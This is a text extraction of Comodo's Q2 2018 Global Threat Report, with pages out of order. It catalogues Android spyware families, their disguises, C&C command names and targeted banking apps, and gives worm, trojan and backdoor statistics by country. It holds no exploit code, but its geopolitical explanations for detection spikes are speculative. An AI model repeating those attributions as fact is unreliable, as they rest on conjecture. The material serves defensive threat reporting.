Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 3 of 73
1 Executive summary
11 Overview
bull In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world bull The malware was detected in 237 countriesrsquotop-level domains bull Russia Turkey and India were the countries with the highest number of worm infections bull The United Kingdom had the highest proportion of detected backdoors bull Ukraine and Russia were the most common countries of detection for viruses bull Germany was the 1 country hit by trojans
12 New Trends 121 Trojans jumped to the top of the malware list The most dangerous sign is the unfolding merger of trojans and phishing emails that amplifies the spreading of the malware Attackers use trojans to deliver other malware and the Trojans surge accompanies a significant increase in other malware infections As such users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity
122 Cryptominers evolved into multifunctional malware Cryptomining decreased in quantity but grew in harmful capabilities As events in Q2 demonstrated this genre of malware is actively developing in two directions better hiding and stronger persistence Cryptominers have gained new features that let them fight antiviruses and deeply root in usersrsquo systems
123 Android malware skyrocketed in variety In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development Android devices have become attractive targets for cybercriminals because modern mobile device represents a treasure trove of data Spyware takes the lead in Android malware types Like real-world spies Android spyware constantly changes guises and methods of avoiding detection And its harmful potential goes up with every new version
